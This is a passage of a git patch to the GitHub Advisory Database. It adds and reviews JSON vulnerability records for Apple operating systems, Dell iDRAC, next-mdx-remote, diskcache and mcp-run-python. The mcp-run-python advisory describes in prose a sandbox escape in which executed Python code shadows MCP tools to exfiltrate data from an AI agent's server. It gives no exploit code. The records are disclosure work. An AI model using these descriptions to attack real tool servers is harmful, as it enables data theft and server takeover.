"github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json b/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json new file mode 100644 index 0000000000000..b9f067faefba5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfq8-v234-58w4/GHSA-rfq8-v234-58w4.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfq8-v234-58w4", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20627" + ], + "details": "An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in watchOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20627" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json new file mode 100644 index 0000000000000..ea18f7e4b6aa5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9g2-54rr-mxmg", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20661" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20661" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json b/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json new file mode 100644 index 0000000000000..4cd3d51203813 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w65x-hpv6-vv6v/GHSA-w65x-hpv6-vv6v.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w65x-hpv6-vv6v", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:03Z", + "aliases": [ + "CVE-2026-20610" + ], + "details": "This issue was addressed with improved handling of symlinks. This issue is fixed in macOS Tahoe 26.3. An app may be able to gain root privileges.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20610" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json b/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json new file mode 100644 index 0000000000000..c1061dadb932d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w82w-6f63-rvgf/GHSA-w82w-6f63-rvgf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w82w-6f63-rvgf", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20678" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20678" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json b/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json new file mode 100644 index 0000000000000..ed8c1f219c284 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj8f-mjpv-f78g", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20634" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted image may result in disclosure of process memory.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20634" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json new file mode 100644 index 0000000000000..825e2b9640018 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wp4v-6rrv-wqv9", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20655" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20655" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json b/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json new file mode 100644 index 0000000000000..d4bd668c00534 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wqpg-jwpg-g42c/GHSA-wqpg-jwpg-g42c.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wqpg-jwpg-g42c", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20681" + ], + "details": "A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Tahoe 26.3. An app may be able to access information about a user's contacts.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20681" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wx45-vx6h-76cq/GHSA-wx45-vx6h-76cq.json b/advisories/unreviewed/2026/02/GHSA-wx45-vx6h-76cq/GHSA-wx45-vx6h-76cq.json new file mode 100644 index 0000000000000..8b7bd0cfe8112 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wx45-vx6h-76cq/GHSA-wx45-vx6h-76cq.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wx45-vx6h-76cq", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20636" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in iOS 26.3 and iPadOS 26.3, Safari 26.3, macOS Tahoe 26.3, visionOS 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20636" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json new file mode 100644 index 0000000000000..f64c8a37255a3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wxwg-9693-mqg4", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20656" + ], + "details": "A logic issue was addressed with improved validation. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5, Safari 26.3, macOS Tahoe 26.3. An app may be able to access a user's Safari history.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20656" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126354" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json new file mode 100644 index 0000000000000..f5c1fe7f502f8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrqq-m9vv-pq36", + "modified": "2026-02-12T00:31:04Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20619" + ], + "details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3. An app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20619" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json new file mode 100644 index 0000000000000..22181f9559544 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw8j-p597-rjrj", + "modified": "2026-02-12T00:31:05Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20680" + ], + "details": "The issue was addressed with additional restrictions on the observability of app states. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, iOS 26.3 and iPadOS 26.3. A sandboxed app may be able to access sensitive user data.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20680" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:10Z" + } +} \ No newline at end of file From 5f8eafbc3f5e93bb8ec238a44641dbb880e1f926 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 03:10:49 +0000 Subject: [PATCH 026/215] Publish Advisories GHSA-pfv4-wmph-5gc6 GHSA-w8v5-vhqr-4h9v GHSA-pfv4-wmph-5gc6 --- .../GHSA-pfv4-wmph-5gc6.json | 61 +++++++++++++++++++ .../GHSA-w8v5-vhqr-4h9v.json | 44 ++++++++++--- .../GHSA-pfv4-wmph-5gc6.json | 36 ----------- 3 files changed, 97 insertions(+), 44 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json (51%) delete mode 100644 advisories/unreviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json diff --git a/advisories/github-reviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json b/advisories/github-reviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json new file mode 100644 index 0000000000000..f742da5a3338b --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfv4-wmph-5gc6", + "modified": "2026-02-12T03:09:38Z", + "published": "2026-02-09T09:30:22Z", + "aliases": [ + "CVE-2026-25905" + ], + "summary": "MCP Run Python has a Sandbox Escape & Server Takeover Vulnerability", + "details": "### Impact\n**Critical Sandbox Escape & Server Takeover:**\nA critical security vulnerability exists in `mcp-run-python` due to a lack of isolation between the Python runtime (Pyodide) and the host JavaScript environment.\n\nThe `runPython` and `runPythonAsync` functions execute Python code using Pyodide without restricting access to the JavaScript bridge. This allows any executed Python code—whether from a user or an AI model—to access the `js` module in Pyodide. Through this bridge, the Python code can modify the global JavaScript environment, interact with the Node.js process, and alter the behavior of the MCP server.\n\n**Specific Attack Vector: MCP Tool Shadowing**\nBecause the Python code can modify the JS runtime, an attacker can dynamically overwrite or \"shadow\" existing MCP tools registered on the server. For example, an attacker could replace a secure file-reading tool with a malicious version that exfiltrates data to an external server, all while the MCP server appears to be functioning normally.\n\n### Patches\n**No Patch Available:**\nThe `mcp-run-python` project is currently **archived** and maintainers have indicated it is unlikely to receive a fix.\n\n**Recommendation:**\nUsers are strongly advised to **immediately stop using** this package.\nIf functionality is required, users must migrate to a maintained alternative that implements proper sandboxing (e.g., running Python in a Docker container or a restricted WASM environment with the JS bridge disabled).\n\n### Workarounds\nThere are no configuration-based workarounds. Securing the environment requires modifying the source code to disable the Pyodide-to-JS bridge or moving the execution environment to a fully isolated sandbox (e.g., a separate container).\n\n### Resources\n* [CVE-2026-25905](https://nvd.nist.gov/vuln/detail/CVE-2026-25905)\n* [JFrog Security Analysis: MCP Takeover](https://research.jfrog.com/vulnerabilities/mcp-run-python-lack-of-isolation-mcp-takeover-jfsa-2026-001653030)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "mcp-run-python" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.0.22" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25905" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/mcp-run-python" + }, + { + "type": "WEB", + "url": "https://research.jfrog.com/vulnerabilities/mcp-run-python-lack-of-isolation-mcp-takeover-jfsa-2026-001653030" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-653" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T03:09:38Z", + "nvd_published_at": "2026-02-09T09:16:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json b/advisories/github-reviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json similarity index 51% rename from advisories/unreviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json rename to advisories/github-reviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json index 6a0984d954338..849220257b52b 100644 --- a/advisories/unreviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json +++ b/advisories/github-reviewed/2026/02/GHSA-w8v5-vhqr-4h9v/GHSA-w8v5-vhqr-4h9v.json @@ -1,14 +1,40 @@ { "schema_version": "1.4.0", "id": "GHSA-w8v5-vhqr-4h9v", - "modified": "2026-02-11T21:30:39Z", + "modified": "2026-02-12T03:09:56Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-69872" ], + "summary": "DiskCache has unsafe pickle deserialization", "details": "DiskCache (python-diskcache) through 5.6.3 uses Python pickle for serialization by default. An attacker with write access to the cache directory can achieve arbitrary code execution when a victim application reads from the cache.", - "severity": [], - "affected": [], + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "diskcache" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "5.6.3" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -19,15 +45,17 @@ "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69872-DiskCache-Pickle-Deserialization.md" }, { - "type": "WEB", + "type": "PACKAGE", "url": "https://github.com/grantjenks/python-diskcache" } ], "database_specific": { - "cwe_ids": [], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T03:09:56Z", "nvd_published_at": "2026-02-11T19:15:50Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json b/advisories/unreviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json deleted file mode 100644 index e34394db1cbb2..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-pfv4-wmph-5gc6/GHSA-pfv4-wmph-5gc6.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pfv4-wmph-5gc6", - "modified": "2026-02-09T09:30:22Z", - "published": "2026-02-09T09:30:22Z", - "aliases": [ - "CVE-2026-25905" - ], - "details": "The Python code being run by 'runPython' or 'runPythonAsync' is not isolated from the rest of the JS code, allowing any Python code to use the Pyodide APIs to modify the JS environment. This may result in an attacker hijacking the MCP server - for malicious purposes including MCP tool shadowing. Note - the \"mcp-run-python\" project is archived and unlikely to receive a fix.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25905" - }, - { - "type": "WEB", - "url": "https://research.jfrog.com/vulnerabilities/mcp-run-python-lack-of-isolation-mcp-takeover-jfsa-2026-001653030" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-653" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-09T09:16:34Z" - } -} \ No newline at end of file From 2026ca69ffea81d4baa2058ce7c94a7530020b00 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 12 Feb 2026 03:32:39 +0000 Subject: [PATCH 027/215] Publish Advisories GHSA-67v7-9rfq-xjgj GHSA-g4xw-jxrg-5f6m GHSA-rqhx-7554-jmg8 GHSA-w33v-jcj5-8c6f --- .../GHSA-67v7-9rfq-xjgj.json | 36 +++++++++++++++++ .../GHSA-g4xw-jxrg-5f6m.json | 36 +++++++++++++++++ .../GHSA-rqhx-7554-jmg8.json | 36 +++++++++++++++++ .../GHSA-w33v-jcj5-8c6f.json | 40 +++++++++++++++++++ 4 files changed, 148 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-67v7-9rfq-xjgj/GHSA-67v7-9rfq-xjgj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rqhx-7554-jmg8/GHSA-rqhx-7554-jmg8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w33v-jcj5-8c6f/GHSA-w33v-jcj5-8c6f.json diff --git a/advisories/unreviewed/2026/02/GHSA-67v7-9rfq-xjgj/GHSA-67v7-9rfq-xjgj.json b/advisories/unreviewed/2026/02/GHSA-67v7-9rfq-xjgj/GHSA-67v7-9rfq-xjgj.json new file mode 100644 index 0000000000000..618f8a55d9e9c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-67v7-9rfq-xjgj/GHSA-67v7-9rfq-xjgj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-67v7-9rfq-xjgj", + "modified": "2026-02-12T03:31:01Z", + "published": "2026-02-12T03:31:01Z", + "aliases": [ + "CVE-2026-23856" + ], + "details": "Dell iDRAC Service Module (iSM) for Windows, versions prior to 6.0.3.1, and Dell iDRAC Service Module (iSM) for Linux, versions prior to 5.4.1.1, contain an Improper Access Control vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23856" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000426282/dsa-2026-077-security-update-for-dell-idrac-service-module-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T03:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json b/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json new file mode 100644 index 0000000000000..157325be9b0a5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g4xw-jxrg-5f6m/GHSA-g4xw-jxrg-5f6m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g4xw-jxrg-5f6m", + "modified": "2026-02-12T03:31:01Z", + "published": "2026-02-12T03:31:01Z", + "aliases": [ + "CVE-2026-0969" + ], + "details": "The serialize function used to compile MDX in next-mdx-remote is vulnerable to arbitrary code execution due to insufficient sanitization of MDX content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0969" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2026-01-arbitrary-code-execution-in-react-server-side-rendering-of-untrusted-mdx-content/77155" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T03:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rqhx-7554-jmg8/GHSA-rqhx-7554-jmg8.json b/advisories/unreviewed/2026/02/GHSA-rqhx-7554-jmg8/GHSA-rqhx-7554-jmg8.json new file mode 100644 index 0000000000000..6e72a5a96eedd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rqhx-7554-jmg8/GHSA-rqhx-7554-jmg8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rqhx-7554-jmg8", + "modified": "2026-02-12T03:31:01Z", + "published": "2026-02-12T03:31:01Z", + "aliases": [ + "CVE-2026-23857" + ], + "details": "Dell Update Package (DUP) Framework, versions 23.12.00 through 24.12.00, contains an Improper Handling of Insufficient Permissions or Privileges vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23857" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000426781/dsa-2026-081-security-update-for-dell-update-package-dup-framework-vulnerability" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-280" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T03:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w33v-jcj5-8c6f/GHSA-w33v-jcj5-8c6f.json b/advisories/unreviewed/2026/02/GHSA-w33v-jcj5-8c6f/GHSA-w33v-jcj5-8c6f.json new file mode 100644 index 0000000000000..c82315e5382f0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w33v-jcj5-8c6f/GHSA-w33v-jcj5-8c6f.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w33v-jcj5-8c6f", + "modified": "2026-02-12T03:31:01Z", + "published": "2026-02-12T03:31:01Z", + "aliases": [ + 